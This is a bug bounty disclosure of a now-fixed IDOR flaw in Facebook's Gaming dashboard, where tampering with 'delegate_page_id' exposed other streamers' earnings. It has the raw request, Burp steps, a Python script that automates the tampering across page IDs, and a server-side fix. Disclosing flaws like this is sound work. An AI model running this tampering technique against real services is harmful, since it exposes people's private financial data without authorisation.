Sarmad Hassan

Published On: 25 Mar 2021

Disclose latest stream video asset earnings for any gaming streamer page

IDOR
Facebook | Web
---
MEDIUM VALID

In the Facebook Gaming dashboard there is an option called "View Stream Report", where streamers can see information about their stream such as the title, description and tagged game. For more info see https://www.facebook.com/business/help/423354648152123?id=648321075955172

Description

The POST request that handles that option is vulnerable to an IDOR bug in the parameter "delegate_page_id": by changing its value, it is possible to disclose the earnings of the latest live stream of any gaming streamer page, not only the attacker's own.

Impact

This allows an attacker to disclose the latest stream video asset earnings for any gaming streamer page.




Reproduction Steps

Step 1

From attacker account
==================
1- Go to https://business.facebook.com/creatorstudio/home ==> Creative tools ==> Live dashboard
2- Go to the Latest stream box ==> turn on interception in Burp Suite ==> click on "View Stream Report"

You should see a POST request like the one below:

POST /api/graphql/ HTTP/1.1
Host: business.facebook.com

av=attacker_page_id&__user=attacker_user_id&__a=1&__dyn=xxx&__csr=&__req=1l&__beoa=0&__pc=PHASED%3Amedia_manager_pkg&dpr=1&__ccg=EXCELLENT&__rev=1003338073&__s=1go6yt%3A1dmt22%3Amrohob&__hsi=6931897176295571644-0&__comet_req=0&fb_dtsg=xxxxxx&jazoest=22015&__jssesw=1&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GamesVideoStreamerDashboardProfilePlusVideoQuery&variables={"delegate_page_id":"attacker_page_ID"}&server_timestamps=true&doc_id=5005787666128910

The vulnerable parameter is "delegate_page_id". Change its value to the page ID of any other streamer page (one the attacker does not administer) and forward the request to the server.

You will get a lot of information about that streamer page, and among it the following private field:

- "latest_stream_video_asset_earnings":"<money amount>", for example:
  "latest_stream_video_asset_earnings":"500.00"

which discloses the earnings from that page's latest stream video.
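To automate the test above across many page IDs, the captured form body has to be rewritten so that only the object reference changes while the session fields stay the attacker's own. The helper below is an added example, not part of the original report and not Facebook tooling: it rewrites the "variables" JSON inside the urlencoded body, keeps av / __user / fb_dtsg / doc_id untouched, and flags a response that carries latest_stream_video_asset_earnings for a page the requester does not own. The form body is a trimmed, constructed copy of the captured request with placeholder IDs, and the nested layout of the constructed response under "data" is an assumption (only the field name comes from the page).

```python
import json
from urllib.parse import parse_qsl, urlencode

# Constructed copy of the captured form body. IDs and tokens are placeholders
# (as on the page), not real Facebook values; unrelated tracking params dropped.
CAPTURED_BODY = (
    "av=attacker_page_id&__user=attacker_user_id&__a=1&fb_dtsg=xxxxxx"
    "&jazoest=22015&fb_api_caller_class=RelayModern"
    "&fb_api_req_friendly_name=GamesVideoStreamerDashboardProfilePlusVideoQuery"
    '&variables={"delegate_page_id":"attacker_page_ID"}'
    "&server_timestamps=true&doc_id=5005787666128910"
)

# Pages the attacker actually administers (constructed).
ATTACKER_PAGES = {"attacker_page_ID"}

# Constructed response for a victim page. The nesting under "data" is an
# assumption; only the earnings field name is taken from the write-up.
VICTIM_RESPONSE = {
    "data": {
        "page": {
            "id": "victim_page_ID",
            "name": "Some Streamer",
            "latest_stream_video_asset_earnings": "500.00",
        }
    }
}


def swap_delegate_page_id(body: str, target_page_id: str) -> str:
    """Return the form body with variables.delegate_page_id replaced.

    Every other field (av, __user, fb_dtsg, doc_id) is left as-is: the
    session stays the attacker's own and only the object reference changes,
    which is exactly what an IDOR test needs.
    """
    rewritten = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key == "variables":
            variables = json.loads(value)
            variables["delegate_page_id"] = target_page_id
            value = json.dumps(variables, separators=(",", ":"))
        rewritten.append((key, value))
    return urlencode(rewritten)


def requested_page_id(body: str) -> str:
    """Read delegate_page_id back out of a form body."""
    params = dict(parse_qsl(body, keep_blank_values=True))
    return json.loads(params["variables"])["delegate_page_id"]


def find_earnings(node) -> list:
    """Collect every latest_stream_video_asset_earnings value anywhere in the
    response, so the check does not depend on the exact nesting."""
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "latest_stream_video_asset_earnings":
                found.append(value)
            found.extend(find_earnings(value))
    elif isinstance(node, list):
        for item in node:
            found.extend(find_earnings(item))
    return found


def leaked_earnings(body: str, response: dict, owned_pages: set):
    """Return the leaked amount when the response exposes earnings for a page
    the requester does not administer, otherwise None."""
    page_id = requested_page_id(body)
    amounts = find_earnings(response)
    if page_id in owned_pages or not amounts:
        return None
    return amounts[0]


if __name__ == "__main__":
    tampered = swap_delegate_page_id(CAPTURED_BODY, "victim_page_ID")
    print(tampered)
    # In a live test you would POST `tampered` with the attacker's own cookies
    # and parse the JSON reply; here the reply is the constructed VICTIM_RESPONSE.
    print("leak:", leaked_earnings(tampered, VICTIM_RESPONSE, ATTACKER_PAGES))
```

The walk in find_earnings is deliberate: GraphQL responses from this endpoint nest the page object under several layers, and a check pinned to one exact path silently misses the field when the schema shifts.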


This information is private and should not be visible to anyone except the page's admins, so the server must verify that the requesting user actually administers the page named by delegate_page_id instead of trusting the client-supplied ID alone.
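The server-side shape of the bug and of its fix, as an added example that is not Facebook's code and not part of the original report: the vulnerable resolver authenticates the session but takes the page to report on straight from the request; the fixed resolver makes an object-level authorisation decision on that page before returning anything private, and lets non-admins see only the public subset. The admin mapping, the dashboard records and the PRIVATE_FIELDS set are constructed; only the earnings field name is from the page.

```python
# Constructed data: who administers which page, and each page's dashboard stats.
PAGE_ADMINS = {
    "attacker_page_ID": {"attacker_user_id"},
    "victim_page_ID": {"victim_user_id"},
}
PAGE_DASHBOARD = {
    "attacker_page_ID": {
        "title": "Tuesday ranked",
        "tagged_game": "Some Game",
        "latest_stream_video_asset_earnings": "12.50",
    },
    "victim_page_ID": {
        "title": "Charity marathon",
        "tagged_game": "Another Game",
        "latest_stream_video_asset_earnings": "500.00",
    },
}

# Fields only a page admin may see (constructed set; the earnings name is the
# one from the write-up).
PRIVATE_FIELDS = {"latest_stream_video_asset_earnings"}


def dashboard_query_vulnerable(user_id: str, delegate_page_id: str):
    """Vulnerable shape: user_id comes from a valid session, but the object the
    caller asks for is taken from the request and never authorised against it.
    Any logged-in user can read any page's earnings."""
    page = PAGE_DASHBOARD.get(delegate_page_id)
    return dict(page) if page is not None else None


def is_page_admin(user_id: str, page_id: str) -> bool:
    """Object-level check: does this user administer this specific page?"""
    return user_id in PAGE_ADMINS.get(page_id, set())


def dashboard_query_fixed(user_id: str, delegate_page_id: str):
    """Fixed shape: the authorisation decision is made on the requested page,
    not on the session alone. Admins get the full record; everyone else gets
    the public subset, so the private field never leaves the server."""
    page = PAGE_DASHBOARD.get(delegate_page_id)
    if page is None:
        return None
    if is_page_admin(user_id, delegate_page_id):
        return dict(page)
    return {k: v for k, v in page.items() if k not in PRIVATE_FIELDS}


if __name__ == "__main__":
    # attacker_user_id is a real, logged-in user, but not an admin of victim_page_ID
    print("vulnerable:", dashboard_query_vulnerable("attacker_user_id", "victim_page_ID"))
    print("fixed:     ", dashboard_query_fixed("attacker_user_id", "victim_page_ID"))
    print("own page:  ", dashboard_query_fixed("victim_user_id", "victim_page_ID"))
```

If the report screen is meant for admins only, rejecting the request outright is also correct; what matters is that the check keys on the page in delegate_page_id, on every call, and not on whether the caller holds a valid session.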

Timeline

22 Feb 2021 - Sarmad: Initial Report
24 Feb 2021 - Facebook: Report Triaged
16 Mar 2021 - Facebook: Report Fixed
16 Mar 2021 - Sarmad: Fix Confirmed
19 Mar 2021 - Facebook: Bounty awarded + Bonus
